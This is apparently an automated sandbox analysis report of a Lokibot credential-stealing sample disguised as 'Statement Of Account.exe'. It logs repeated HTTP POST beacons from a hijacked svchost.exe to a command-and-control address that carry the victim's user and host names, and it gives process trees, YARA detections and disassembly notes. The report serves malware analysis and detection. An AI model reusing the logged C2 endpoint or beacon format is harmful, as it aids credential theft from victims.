Oct 27, 2024 08:52:02.142282009 CET	245	OUT	POST /skipo/five/fre.php HTTP/1.0 User-Agent: Mozilla/4.08 (Charon; Inferno) Host: 94.156.177.220 Accept: / Content-Type: application/octet-stream Content-Encoding: binary Content-Key: E1DD60CA Content-Length: 153 Connection: close
Oct 27, 2024 08:52:02.147703886 CET	153	OUT	Data Raw: 12 00 28 00 00 00 07 00 00 00 63 6b 61 76 2e 72 75 01 00 0c 00 00 00 61 00 6c 00 66 00 6f 00 6e 00 73 00 01 00 0c 00 00 00 36 00 32 00 31 00 33 00 36 00 35 00 01 00 12 00 00 00 41 00 4c 00 46 00 4f 00 4e 00 53 00 2d 00 50 00 43 00 00 05 00 00 00 Data Ascii: (ckav.rualfons621365ALFONS-PC0FDD42EE188E931437F4FBE2C
Oct 27, 2024 08:52:03.097754002 CET	236	IN	HTTP/1.1 404 Not Found Server: nginx/1.26.1 Date: Sun, 27 Oct 2024 07:52:02 GMT Content-Type: text/html; charset=UTF-8 Content-Length: 23 Connection: close X-Powered-By: PHP/5.4.16 Status: 404 Not Found Data Raw: 08 00 00 00 00 00 00 00 46 69 6c 65 20 6e 6f 74 20 66 6f 75 6e 64 2e Data Ascii: File not found.

Session ID	Source IP	Source Port	Destination IP	Destination Port	PID	Process
93	192.168.2.5	50070	94.156.177.220	80	5648	C:\Windows\SysWOW64\svchost.exe

Timestamp	Bytes transferred	Direction	Data
Oct 27, 2024 08:52:03.267963886 CET	245	OUT	POST /skipo/five/fre.php HTTP/1.0 User-Agent: Mozilla/4.08 (Charon; Inferno) Host: 94.156.177.220 Accept: / Content-Type: application/octet-stream Content-Encoding: binary Content-Key: E1DD60CA Content-Length: 153 Connection: close
Oct 27, 2024 08:52:03.273449898 CET	153	OUT	Data Raw: 12 00 28 00 00 00 07 00 00 00 63 6b 61 76 2e 72 75 01 00 0c 00 00 00 61 00 6c 00 66 00 6f 00 6e 00 73 00 01 00 0c 00 00 00 36 00 32 00 31 00 33 00 36 00 35 00 01 00 12 00 00 00 41 00 4c 00 46 00 4f 00 4e 00 53 00 2d 00 50 00 43 00 00 05 00 00 00 Data Ascii: (ckav.rualfons621365ALFONS-PC0FDD42EE188E931437F4FBE2C
Oct 27, 2024 08:52:04.229466915 CET	236	IN	HTTP/1.1 404 Not Found Server: nginx/1.26.1 Date: Sun, 27 Oct 2024 07:52:04 GMT Content-Type: text/html; charset=UTF-8 Content-Length: 23 Connection: close X-Powered-By: PHP/5.4.16 Status: 404 Not Found Data Raw: 08 00 00 00 00 00 00 00 46 69 6c 65 20 6e 6f 74 20 66 6f 75 6e 64 2e Data Ascii: File not found.

Session ID	Source IP	Source Port	Destination IP	Destination Port	PID	Process
94	192.168.2.5	50071	94.156.177.220	80	5648	C:\Windows\SysWOW64\svchost.exe

Timestamp	Bytes transferred	Direction	Data
Oct 27, 2024 08:52:05.219342947 CET	245	OUT	POST /skipo/five/fre.php HTTP/1.0 User-Agent: Mozilla/4.08 (Charon; Inferno) Host: 94.156.177.220 Accept: / Content-Type: application/octet-stream Content-Encoding: binary Content-Key: E1DD60CA Content-Length: 153 Connection: close
Oct 27, 2024 08:52:05.224736929 CET	153	OUT	Data Raw: 12 00 28 00 00 00 07 00 00 00 63 6b 61 76 2e 72 75 01 00 0c 00 00 00 61 00 6c 00 66 00 6f 00 6e 00 73 00 01 00 0c 00 00 00 36 00 32 00 31 00 33 00 36 00 35 00 01 00 12 00 00 00 41 00 4c 00 46 00 4f 00 4e 00 53 00 2d 00 50 00 43 00 00 05 00 00 00 Data Ascii: (ckav.rualfons621365ALFONS-PC0FDD42EE188E931437F4FBE2C
Oct 27, 2024 08:52:06.200335979 CET	236	IN	HTTP/1.1 404 Not Found Server: nginx/1.26.1 Date: Sun, 27 Oct 2024 07:52:06 GMT Content-Type: text/html; charset=UTF-8 Content-Length: 23 Connection: close X-Powered-By: PHP/5.4.16 Status: 404 Not Found Data Raw: 08 00 00 00 00 00 00 00 46 69 6c 65 20 6e 6f 74 20 66 6f 75 6e 64 2e Data Ascii: File not found.

Session ID	Source IP	Source Port	Destination IP	Destination Port	PID	Process
95	192.168.2.5	50072	94.156.177.220	80	5648	C:\Windows\SysWOW64\svchost.exe

Timestamp	Bytes transferred	Direction	Data
Oct 27, 2024 08:52:06.366476059 CET	245	OUT	POST /skipo/five/fre.php HTTP/1.0 User-Agent: Mozilla/4.08 (Charon; Inferno) Host: 94.156.177.220 Accept: / Content-Type: application/octet-stream Content-Encoding: binary Content-Key: E1DD60CA Content-Length: 153 Connection: close
Oct 27, 2024 08:52:06.371984005 CET	153	OUT	Data Raw: 12 00 28 00 00 00 07 00 00 00 63 6b 61 76 2e 72 75 01 00 0c 00 00 00 61 00 6c 00 66 00 6f 00 6e 00 73 00 01 00 0c 00 00 00 36 00 32 00 31 00 33 00 36 00 35 00 01 00 12 00 00 00 41 00 4c 00 46 00 4f 00 4e 00 53 00 2d 00 50 00 43 00 00 05 00 00 00 Data Ascii: (ckav.rualfons621365ALFONS-PC0FDD42EE188E931437F4FBE2C
Oct 27, 2024 08:52:07.341907024 CET	236	IN	HTTP/1.1 404 Not Found Server: nginx/1.26.1 Date: Sun, 27 Oct 2024 07:52:07 GMT Content-Type: text/html; charset=UTF-8 Content-Length: 23 Connection: close X-Powered-By: PHP/5.4.16 Status: 404 Not Found Data Raw: 08 00 00 00 00 00 00 00 46 69 6c 65 20 6e 6f 74 20 66 6f 75 6e 64 2e Data Ascii: File not found.

Session ID	Source IP	Source Port	Destination IP	Destination Port
96	192.168.2.5	50073	94.156.177.220	80

Timestamp	Bytes transferred	Direction	Data
Oct 27, 2024 08:52:07.606265068 CET	245	OUT	POST /skipo/five/fre.php HTTP/1.0 User-Agent: Mozilla/4.08 (Charon; Inferno) Host: 94.156.177.220 Accept: / Content-Type: application/octet-stream Content-Encoding: binary Content-Key: E1DD60CA Content-Length: 153 Connection: close
Oct 27, 2024 08:52:07.611756086 CET	153	OUT	Data Raw: 12 00 28 00 00 00 07 00 00 00 63 6b 61 76 2e 72 75 01 00 0c 00 00 00 61 00 6c 00 66 00 6f 00 6e 00 73 00 01 00 0c 00 00 00 36 00 32 00 31 00 33 00 36 00 35 00 01 00 12 00 00 00 41 00 4c 00 46 00 4f 00 4e 00 53 00 2d 00 50 00 43 00 00 05 00 00 00 Data Ascii: (ckav.rualfons621365ALFONS-PC0FDD42EE188E931437F4FBE2C
Oct 27, 2024 08:52:08.580118895 CET	236	IN	HTTP/1.1 404 Not Found Server: nginx/1.26.1 Date: Sun, 27 Oct 2024 07:52:08 GMT Content-Type: text/html; charset=UTF-8 Content-Length: 23 Connection: close X-Powered-By: PHP/5.4.16 Status: 404 Not Found Data Raw: 08 00 00 00 00 00 00 00 46 69 6c 65 20 6e 6f 74 20 66 6f 75 6e 64 2e Data Ascii: File not found.

Target ID:	0
Start time:	03:50:00
Start date:	27/10/2024
Path:	C:\Users\user\Desktop\Statement Of Account.exe
Wow64 process (32bit):	true
Commandline:	"C:\Users\user\Desktop\Statement Of Account.exe"
Imagebase:	0x400000
File size:	576'269 bytes
MD5 hash:	8D03A09D0F5D5F2C196BE0657D169636
Has elevated privileges:	true
Has administrator privileges:	true
Programmed in:	C, C++ or other language
Yara matches:	Rule: JoeSecurity_Lokibot, Description: Yara detected Lokibot, Source: 00000000.00000002.2061105444.0000000000B80000.00000004.00001000.00020000.00000000.sdmp, Author: Joe Security Rule: JoeSecurity_aPLib_compressed_binary, Description: Yara detected aPLib compressed binary, Source: 00000000.00000002.2061105444.0000000000B80000.00000004.00001000.00020000.00000000.sdmp, Author: Joe Security Rule: JoeSecurity_CredentialStealer, Description: Yara detected Credential Stealer, Source: 00000000.00000002.2061105444.0000000000B80000.00000004.00001000.00020000.00000000.sdmp, Author: Joe Security Rule: Windows_Trojan_Lokibot_1f885282, Description: unknown, Source: 00000000.00000002.2061105444.0000000000B80000.00000004.00001000.00020000.00000000.sdmp, Author: unknown Rule: Windows_Trojan_Lokibot_0f421617, Description: unknown, Source: 00000000.00000002.2061105444.0000000000B80000.00000004.00001000.00020000.00000000.sdmp, Author: unknown Rule: Loki_1, Description: Loki Payload, Source: 00000000.00000002.2061105444.0000000000B80000.00000004.00001000.00020000.00000000.sdmp, Author: kevoreilly Rule: Lokibot, Description: detect Lokibot in memory, Source: 00000000.00000002.2061105444.0000000000B80000.00000004.00001000.00020000.00000000.sdmp, Author: JPCERT/CC Incident Response Group Rule: INDICATOR_SUSPICIOUS_GENInfoStealer, Description: Detects executables containing common artifcats observed in infostealers, Source: 00000000.00000002.2061105444.0000000000B80000.00000004.00001000.00020000.00000000.sdmp, Author: ditekSHen
Reputation:	low
Has exited:	true

Show Windows behavior

Target ID:	2
Start time:	03:50:02
Start date:	27/10/2024
Path:	C:\Windows\SysWOW64\svchost.exe
Wow64 process (32bit):	false
Commandline:	"C:\Users\user\Desktop\Statement Of Account.exe"
Imagebase:	0x120000
File size:	46'504 bytes
MD5 hash:	1ED18311E3DA35942DB37D15FA40CC5B
Has elevated privileges:	true
Has administrator privileges:	true
Programmed in:	C, C++ or other language
Reputation:	high
Has exited:	true

Show Windows behavior

Target ID:	3
Start time:	03:50:03
Start date:	27/10/2024
Path:	C:\Users\user\Desktop\Statement Of Account.exe
Wow64 process (32bit):	true
Commandline:	"C:\Users\user\Desktop\Statement Of Account.exe"
Imagebase:	0x400000
File size:	576'269 bytes
MD5 hash:	8D03A09D0F5D5F2C196BE0657D169636
Has elevated privileges:	true
Has administrator privileges:	true
Programmed in:	C, C++ or other language
Yara matches:	Rule: JoeSecurity_Lokibot, Description: Yara detected Lokibot, Source: 00000003.00000002.2078717207.0000000002FB0000.00000004.00001000.00020000.00000000.sdmp, Author: Joe Security Rule: JoeSecurity_aPLib_compressed_binary, Description: Yara detected aPLib compressed binary, Source: 00000003.00000002.2078717207.0000000002FB0000.00000004.00001000.00020000.00000000.sdmp, Author: Joe Security Rule: JoeSecurity_CredentialStealer, Description: Yara detected Credential Stealer, Source: 00000003.00000002.2078717207.0000000002FB0000.00000004.00001000.00020000.00000000.sdmp, Author: Joe Security Rule: Windows_Trojan_Lokibot_1f885282, Description: unknown, Source: 00000003.00000002.2078717207.0000000002FB0000.00000004.00001000.00020000.00000000.sdmp, Author: unknown Rule: Windows_Trojan_Lokibot_0f421617, Description: unknown, Source: 00000003.00000002.2078717207.0000000002FB0000.00000004.00001000.00020000.00000000.sdmp, Author: unknown Rule: Loki_1, Description: Loki Payload, Source: 00000003.00000002.2078717207.0000000002FB0000.00000004.00001000.00020000.00000000.sdmp, Author: kevoreilly Rule: Lokibot, Description: detect Lokibot in memory, Source: 00000003.00000002.2078717207.0000000002FB0000.00000004.00001000.00020000.00000000.sdmp, Author: JPCERT/CC Incident Response Group Rule: INDICATOR_SUSPICIOUS_GENInfoStealer, Description: Detects executables containing common artifcats observed in infostealers, Source: 00000003.00000002.2078717207.0000000002FB0000.00000004.00001000.00020000.00000000.sdmp, Author: ditekSHen
Reputation:	low
Has exited:	true

Show Windows behavior

Target ID:	4
Start time:	03:50:04
Start date:	27/10/2024
Path:	C:\Windows\SysWOW64\svchost.exe
Wow64 process (32bit):	false
Commandline:	"C:\Users\user\Desktop\Statement Of Account.exe"
Imagebase:	0x120000
File size:	46'504 bytes
MD5 hash:	1ED18311E3DA35942DB37D15FA40CC5B
Has elevated privileges:	true
Has administrator privileges:	true
Programmed in:	C, C++ or other language
Reputation:	high
Has exited:	true

Show Windows behavior

Target ID:	5
Start time:	03:50:05
Start date:	27/10/2024
Path:	C:\Users\user\Desktop\Statement Of Account.exe
Wow64 process (32bit):	true
Commandline:	"C:\Users\user\Desktop\Statement Of Account.exe"
Imagebase:	0x400000
File size:	576'269 bytes
MD5 hash:	8D03A09D0F5D5F2C196BE0657D169636
Has elevated privileges:	true
Has administrator privileges:	true
Programmed in:	C, C++ or other language
Yara matches:	Rule: JoeSecurity_Lokibot, Description: Yara detected Lokibot, Source: 00000005.00000002.2103948466.0000000003A20000.00000004.00001000.00020000.00000000.sdmp, Author: Joe Security Rule: JoeSecurity_aPLib_compressed_binary, Description: Yara detected aPLib compressed binary, Source: 00000005.00000002.2103948466.0000000003A20000.00000004.00001000.00020000.00000000.sdmp, Author: Joe Security Rule: JoeSecurity_CredentialStealer, Description: Yara detected Credential Stealer, Source: 00000005.00000002.2103948466.0000000003A20000.00000004.00001000.00020000.00000000.sdmp, Author: Joe Security Rule: Windows_Trojan_Lokibot_1f885282, Description: unknown, Source: 00000005.00000002.2103948466.0000000003A20000.00000004.00001000.00020000.00000000.sdmp, Author: unknown Rule: Windows_Trojan_Lokibot_0f421617, Description: unknown, Source: 00000005.00000002.2103948466.0000000003A20000.00000004.00001000.00020000.00000000.sdmp, Author: unknown Rule: Loki_1, Description: Loki Payload, Source: 00000005.00000002.2103948466.0000000003A20000.00000004.00001000.00020000.00000000.sdmp, Author: kevoreilly Rule: Lokibot, Description: detect Lokibot in memory, Source: 00000005.00000002.2103948466.0000000003A20000.00000004.00001000.00020000.00000000.sdmp, Author: JPCERT/CC Incident Response Group Rule: INDICATOR_SUSPICIOUS_GENInfoStealer, Description: Detects executables containing common artifcats observed in infostealers, Source: 00000005.00000002.2103948466.0000000003A20000.00000004.00001000.00020000.00000000.sdmp, Author: ditekSHen
Reputation:	low
Has exited:	true

Show Windows behavior

Target ID:	6
Start time:	03:50:07
Start date:	27/10/2024
Path:	C:\Windows\SysWOW64\svchost.exe
Wow64 process (32bit):	false
Commandline:	"C:\Users\user\Desktop\Statement Of Account.exe"
Imagebase:	0x120000
File size:	46'504 bytes
MD5 hash:	1ED18311E3DA35942DB37D15FA40CC5B
Has elevated privileges:	true
Has administrator privileges:	true
Programmed in:	C, C++ or other language
Reputation:	high
Has exited:	true

Show Windows behavior

Target ID:	7
Start time:	03:50:07
Start date:	27/10/2024
Path:	C:\Users\user\Desktop\Statement Of Account.exe
Wow64 process (32bit):	true
Commandline:	"C:\Users\user\Desktop\Statement Of Account.exe"
Imagebase:	0x7ff6d64d0000
File size:	576'269 bytes
MD5 hash:	8D03A09D0F5D5F2C196BE0657D169636
Has elevated privileges:	true
Has administrator privileges:	true
Programmed in:	C, C++ or other language
Yara matches:	Rule: JoeSecurity_Lokibot, Description: Yara detected Lokibot, Source: 00000007.00000002.2121457716.0000000000A80000.00000004.00001000.00020000.00000000.sdmp, Author: Joe Security Rule: JoeSecurity_aPLib_compressed_binary, Description: Yara detected aPLib compressed binary, Source: 00000007.00000002.2121457716.0000000000A80000.00000004.00001000.00020000.00000000.sdmp, Author: Joe Security Rule: JoeSecurity_CredentialStealer, Description: Yara detected Credential Stealer, Source: 00000007.00000002.2121457716.0000000000A80000.00000004.00001000.00020000.00000000.sdmp, Author: Joe Security Rule: Windows_Trojan_Lokibot_1f885282, Description: unknown, Source: 00000007.00000002.2121457716.0000000000A80000.00000004.00001000.00020000.00000000.sdmp, Author: unknown Rule: Windows_Trojan_Lokibot_0f421617, Description: unknown, Source: 00000007.00000002.2121457716.0000000000A80000.00000004.00001000.00020000.00000000.sdmp, Author: unknown Rule: Loki_1, Description: Loki Payload, Source: 00000007.00000002.2121457716.0000000000A80000.00000004.00001000.00020000.00000000.sdmp, Author: kevoreilly Rule: Lokibot, Description: detect Lokibot in memory, Source: 00000007.00000002.2121457716.0000000000A80000.00000004.00001000.00020000.00000000.sdmp, Author: JPCERT/CC Incident Response Group Rule: INDICATOR_SUSPICIOUS_GENInfoStealer, Description: Detects executables containing common artifcats observed in infostealers, Source: 00000007.00000002.2121457716.0000000000A80000.00000004.00001000.00020000.00000000.sdmp, Author: ditekSHen
Reputation:	low
Has exited:	true

Show Windows behavior

Target ID:	8
Start time:	03:50:09
Start date:	27/10/2024
Path:	C:\Windows\SysWOW64\svchost.exe
Wow64 process (32bit):	false
Commandline:	"C:\Users\user\Desktop\Statement Of Account.exe"
Imagebase:	0x120000
File size:	46'504 bytes
MD5 hash:	1ED18311E3DA35942DB37D15FA40CC5B
Has elevated privileges:	true
Has administrator privileges:	true
Programmed in:	C, C++ or other language
Reputation:	high
Has exited:	true

Show Windows behavior

Target ID:	9
Start time:	03:50:09
Start date:	27/10/2024
Path:	C:\Users\user\Desktop\Statement Of Account.exe
Wow64 process (32bit):	true
Commandline:	"C:\Users\user\Desktop\Statement Of Account.exe"
Imagebase:	0x400000
File size:	576'269 bytes
MD5 hash:	8D03A09D0F5D5F2C196BE0657D169636
Has elevated privileges:	true
Has administrator privileges:	true
Programmed in:	C, C++ or other language
Yara matches:	Rule: JoeSecurity_Lokibot, Description: Yara detected Lokibot, Source: 00000009.00000002.2140094185.0000000002EB0000.00000004.00001000.00020000.00000000.sdmp, Author: Joe Security Rule: JoeSecurity_aPLib_compressed_binary, Description: Yara detected aPLib compressed binary, Source: 00000009.00000002.2140094185.0000000002EB0000.00000004.00001000.00020000.00000000.sdmp, Author: Joe Security Rule: JoeSecurity_CredentialStealer, Description: Yara detected Credential Stealer, Source: 00000009.00000002.2140094185.0000000002EB0000.00000004.00001000.00020000.00000000.sdmp, Author: Joe Security Rule: Windows_Trojan_Lokibot_1f885282, Description: unknown, Source: 00000009.00000002.2140094185.0000000002EB0000.00000004.00001000.00020000.00000000.sdmp, Author: unknown Rule: Windows_Trojan_Lokibot_0f421617, Description: unknown, Source: 00000009.00000002.2140094185.0000000002EB0000.00000004.00001000.00020000.00000000.sdmp, Author: unknown Rule: Loki_1, Description: Loki Payload, Source: 00000009.00000002.2140094185.0000000002EB0000.00000004.00001000.00020000.00000000.sdmp, Author: kevoreilly Rule: Lokibot, Description: detect Lokibot in memory, Source: 00000009.00000002.2140094185.0000000002EB0000.00000004.00001000.00020000.00000000.sdmp, Author: JPCERT/CC Incident Response Group Rule: INDICATOR_SUSPICIOUS_GENInfoStealer, Description: Detects executables containing common artifcats observed in infostealers, Source: 00000009.00000002.2140094185.0000000002EB0000.00000004.00001000.00020000.00000000.sdmp, Author: ditekSHen
Reputation:	low
Has exited:	true

Show Windows behavior

Target ID:	10
Start time:	03:50:10
Start date:	27/10/2024
Path:	C:\Windows\SysWOW64\svchost.exe
Wow64 process (32bit):	true
Commandline:	"C:\Users\user\Desktop\Statement Of Account.exe"
Imagebase:	0x120000
File size:	46'504 bytes
MD5 hash:	1ED18311E3DA35942DB37D15FA40CC5B
Has elevated privileges:	true
Has administrator privileges:	true
Programmed in:	C, C++ or other language
Yara matches:	Rule: JoeSecurity_Lokibot, Description: Yara detected Lokibot, Source: 0000000A.00000002.3295786931.0000000000400000.00000040.80000000.00040000.00000000.sdmp, Author: Joe Security Rule: JoeSecurity_aPLib_compressed_binary, Description: Yara detected aPLib compressed binary, Source: 0000000A.00000002.3295786931.0000000000400000.00000040.80000000.00040000.00000000.sdmp, Author: Joe Security Rule: JoeSecurity_CredentialStealer, Description: Yara detected Credential Stealer, Source: 0000000A.00000002.3295786931.0000000000400000.00000040.80000000.00040000.00000000.sdmp, Author: Joe Security Rule: Windows_Trojan_Lokibot_1f885282, Description: unknown, Source: 0000000A.00000002.3295786931.0000000000400000.00000040.80000000.00040000.00000000.sdmp, Author: unknown Rule: Windows_Trojan_Lokibot_0f421617, Description: unknown, Source: 0000000A.00000002.3295786931.0000000000400000.00000040.80000000.00040000.00000000.sdmp, Author: unknown Rule: Loki_1, Description: Loki Payload, Source: 0000000A.00000002.3295786931.0000000000400000.00000040.80000000.00040000.00000000.sdmp, Author: kevoreilly Rule: Lokibot, Description: detect Lokibot in memory, Source: 0000000A.00000002.3295786931.0000000000400000.00000040.80000000.00040000.00000000.sdmp, Author: JPCERT/CC Incident Response Group Rule: INDICATOR_SUSPICIOUS_GENInfoStealer, Description: Detects executables containing common artifcats observed in infostealers, Source: 0000000A.00000002.3295786931.0000000000400000.00000040.80000000.00040000.00000000.sdmp, Author: ditekSHen Rule: JoeSecurity_Lokibot_1, Description: Yara detected Lokibot, Source: 0000000A.00000002.3296173154.0000000002E12000.00000004.00000020.00020000.00000000.sdmp, Author: Joe Security
Reputation:	high
Has exited:	false

Show Windows behavior

Execution Graph

Execution Coverage:	3.3%
Dynamic/Decrypted Code Coverage:	1.1%
Signature Coverage:	3.1%
Total number of Nodes:	1698
Total number of Limit Nodes:	51

Executed Functions

Function 00409A40 Relevance: 32.2, APIs: 15, Strings: 2, Instructions: 2432COMMON

Download Yara Rule

APIs

_wcslen.LIBCMT ref: 00409A61

Part of subcall function 0041171A: _malloc.LIBCMT ref: 00411734

Part of subcall function 0041171A: std::bad_alloc::bad_alloc.LIBCMT ref: 00411757
Part of subcall function 0041171A: std::bad_exception::bad_exception.LIBCMT ref: 0041176B
Part of subcall function 0041171A: __CxxThrowException@8.LIBCMT ref: 00411779

CharUpperBuffW.USER32(?,?), ref: 00409AF5

Strings

4RH, xrefs: 0042D5BE
0vH, xrefs: 0042E5E9

Memory Dump Source

Source File: 00000000.00000002.2058137213.0000000000401000.00000040.00000001.01000000.00000003.sdmp, Offset: 00400000, based on PE: true

Associated: 00000000.00000002.2058113290.0000000000400000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2058137213.0000000000482000.00000040.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2058137213.0000000000490000.00000040.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2058137213.00000000004A7000.00000040.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2058137213.00000000004B1000.00000040.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2058137213.00000000004B5000.00000040.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2060010084.00000000004B8000.00000080.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2060066331.00000000004B9000.00000004.00000001.01000000.00000003.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_0_2_400000_Statement Of Account.jbxd

Similarity

API ID: BuffCharException@8ThrowUpper_malloc_wcslenstd::bad_alloc::bad_allocstd::bad_exception::bad_exception
String ID: 0vH$4RH
API String ID: 1143807570-2085553193
Opcode ID: 9afcfa0464a8bf2340200ce8ce710be87dd534dff684ebea75dae85cfdd7aee9
Instruction ID: 7c8f52bff4b3ea9a641e6aac08ab5e1c8beb32691f0f21fab5f23224d73a3634
Opcode Fuzzy Hash: 9afcfa0464a8bf2340200ce8ce710be87dd534dff684ebea75dae85cfdd7aee9
Instruction Fuzzy Hash: 34238170A043109FD724DF25D480A6BB7E1BF89304F54896EE84A9B391D739EC46CB9B

Function 0040D6D0 Relevance: 28.1, APIs: 11, Strings: 5, Instructions: 141
windowCOMMON

Download Yara Rule

Control-flow Graph

Executed
Not Executed

APIs

GetCurrentDirectoryW.KERNEL32(00000104,?,00000001,?,00000000), ref: 0040D6E5

Part of subcall function 00401F80: GetModuleFileNameW.KERNEL32(00000000,C:\Users\user\Desktop\Statement Of Account.exe,00000104,?,?,?,?,00000000), ref: 00401FAD
Part of subcall function 00401F80: __wcsicoll.LIBCMT ref: 00402078
Part of subcall function 00401F80: __wcsicoll.LIBCMT ref: 0040208E
Part of subcall function 00401F80: __wcsicoll.LIBCMT ref: 004020A4
Part of subcall function 00401F80: __wcsicoll.LIBCMT ref: 004020BA
Part of subcall function 00401F80: _wcscpy.LIBCMT ref: 004020EF

IsDebuggerPresent.KERNEL32(?), ref: 0040D6F1
GetFullPathNameW.KERNEL32(C:\Users\user\Desktop\Statement Of Account.exe,00000104,?,004A7CF8,004A7CFC), ref: 0040D763

Part of subcall function 00401440: GetFullPathNameW.KERNEL32(?,00000104,?,00000000), ref: 00401483

SetCurrentDirectoryW.KERNEL32(?,00000001,C:\Users\user\Desktop\Statement Of Account.exe,00000004), ref: 0040D7D6
MessageBoxA.USER32(00000000,This is a compiled AutoIt script. AV researchers please email avsupport@autoitscript.com for support.,004846D6,00000010), ref: 00431AAB
SetCurrentDirectoryW.KERNEL32(?,C:\Users\user\Desktop\Statement Of Account.exe,00000004), ref: 00431B0E
GetModuleFileNameW.KERNEL32(00000000,?,00000104,C:\Users\user\Desktop\Statement Of Account.exe,00000004), ref: 00431B3F
GetForegroundWindow.USER32(runas,?,?,?,00000001), ref: 00431B8B
ShellExecuteW.SHELL32(00000000), ref: 00431B92

Part of subcall function 004101F0: GetSysColorBrush.USER32(0000000F), ref: 004101F9
Part of subcall function 004101F0: LoadCursorW.USER32(00000000,00007F00), ref: 00410209
Part of subcall function 004101F0: LoadIconW.USER32(?,00000063), ref: 0041021F
Part of subcall function 004101F0: LoadIconW.USER32(?,000000A4), ref: 00410232
Part of subcall function 004101F0: LoadIconW.USER32(?,000000A2), ref: 00410245
Part of subcall function 004101F0: LoadImageW.USER32(?,00000063,00000001,00000010,00000010,00000000), ref: 0041026A
Part of subcall function 004101F0: RegisterClassExW.USER32 ref: 004102C6

Part of subcall function 004103E0: CreateWindowExW.USER32(00000000,AutoIt v3,AutoIt v3,00CF0000,80000000,80000000,0000012C,00000064,00000000,00000000,?,00000000), ref: 00410415
Part of subcall function 004103E0: CreateWindowExW.USER32(00000000,edit,00000000,50B008C4,00000000,00000000,00000000,00000000,00000000,00000001,?,00000000), ref: 0041043E
Part of subcall function 004103E0: ShowWindow.USER32(?,00000000), ref: 00410454
Part of subcall function 004103E0: ShowWindow.USER32(?,00000000), ref: 0041045E

Part of subcall function 0040E1E0: _memset.LIBCMT ref: 0040E202
Part of subcall function 0040E1E0: Shell_NotifyIconW.SHELL32(00000000,?), ref: 0040E2C7

Strings

This is a compiled AutoIt script. AV researchers please email avsupport@autoitscript.com for support., xrefs: 00431AA4
@GH, xrefs: 00431B4C
C:\Users\user\Desktop\Statement Of Account.exe, xrefs: 0040D728, 0040D758, 0040D770, 00431B5A
runas, xrefs: 00431B86, 00431BB4
@GH, xrefs: 00431B66

Memory Dump Source

Source File: 00000000.00000002.2058137213.0000000000401000.00000040.00000001.01000000.00000003.sdmp, Offset: 00400000, based on PE: true

Associated: 00000000.00000002.2058113290.0000000000400000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2058137213.0000000000482000.00000040.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2058137213.0000000000490000.00000040.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2058137213.00000000004A7000.00000040.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2058137213.00000000004B1000.00000040.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2058137213.00000000004B5000.00000040.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2060010084.00000000004B8000.00000080.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2060066331.00000000004B9000.00000004.00000001.01000000.00000003.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_0_2_400000_Statement Of Account.jbxd

Similarity

API ID: LoadWindow$IconName__wcsicoll$CurrentDirectory$CreateFileFullModulePathShow$BrushClassColorCursorDebuggerExecuteForegroundImageMessageNotifyPresentRegisterShellShell__memset_wcscpy
String ID: @GH$@GH$C:\Users\user\Desktop\Statement Of Account.exe$This is a compiled AutoIt script. AV researchers please email avsupport@autoitscript.com for support.$runas
API String ID: 2493088469-868023777
Opcode ID: 1a0ed8742bd98226e3ba0f055742ccaca08136dd93b2b863f89549b94dfb798c
Instruction ID: f6e0ab4c143dd9a1f797559286fb6c41f0380d60009eb7dc722615656bf0e84e
Opcode Fuzzy Hash: 1a0ed8742bd98226e3ba0f055742ccaca08136dd93b2b863f89549b94dfb798c
Instruction Fuzzy Hash: 0341F731618341ABD320F7A19C49BAF3BA4AB96704F04493FF941672D1DBBC9949C72E

Function 0040E470 Relevance: 14.2, APIs: 7, Strings: 1, Instructions: 165
COMMON

Download Yara Rule

Control-flow Graph

Executed
Not Executed

APIs

GetVersionExW.KERNEL32 ref: 0040E495

Part of subcall function 004021E0: _wcslen.LIBCMT ref: 004021F2

GetCurrentProcess.KERNEL32(?,?), ref: 0040E560
GetNativeSystemInfo.KERNELBASE(?,?), ref: 0040E5D3
FreeLibrary.KERNEL32(?), ref: 0040E5DE
FreeLibrary.KERNEL32(?), ref: 0040E5F2

Strings

pMH, xrefs: 0040E4C2

Memory Dump Source

Source File: 00000000.00000002.2058137213.0000000000401000.00000040.00000001.01000000.00000003.sdmp, Offset: 00400000, based on PE: true

Associated: 00000000.00000002.2058113290.0000000000400000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2058137213.0000000000482000.00000040.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2058137213.0000000000490000.00000040.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2058137213.00000000004A7000.00000040.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2058137213.00000000004B1000.00000040.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2058137213.00000000004B5000.00000040.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2060010084.00000000004B8000.00000080.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2060066331.00000000004B9000.00000004.00000001.01000000.00000003.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_0_2_400000_Statement Of Account.jbxd

Similarity

API ID: FreeLibrary$CurrentInfoNativeProcessSystemVersion_wcslen
String ID: pMH
API String ID: 2923339712-2522892712
Opcode ID: 3f36deb7b7369dd68d3c05326faf84e57561e58110467ef3184d2bc56fc1d5cf
Instruction ID: 31d199e0849a18b4fe3a20375a839c17b1fda7a8e5a404adfed2e153d323e8b3
Opcode Fuzzy Hash: 3f36deb7b7369dd68d3c05326faf84e57561e58110467ef3184d2bc56fc1d5cf
